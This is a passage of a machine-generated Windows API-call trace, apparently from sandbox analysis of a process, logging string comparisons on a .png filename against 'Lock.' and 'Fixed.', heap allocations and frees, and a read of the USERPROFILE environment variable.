[0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DjTk 0Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jTk 0Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tk 0Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k 0Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 0Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dq17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="17Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pz4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AMa.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ma.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0121.895] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0121.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0121.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa66f0 [0121.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0121.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DjTk 0Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jTk 0Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tk 0Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k 0Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 0Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.896] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dq17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="17Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pz4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AMa.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ma.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0121.907] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0121.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0121.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0121.908] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0121.908] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0121.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0121.909] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0121.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0121.910] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0121.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0121.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0121.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0121.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0121.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0121.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0121.912] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0121.912] HeapFree (in: hHeap=0x2af0000, 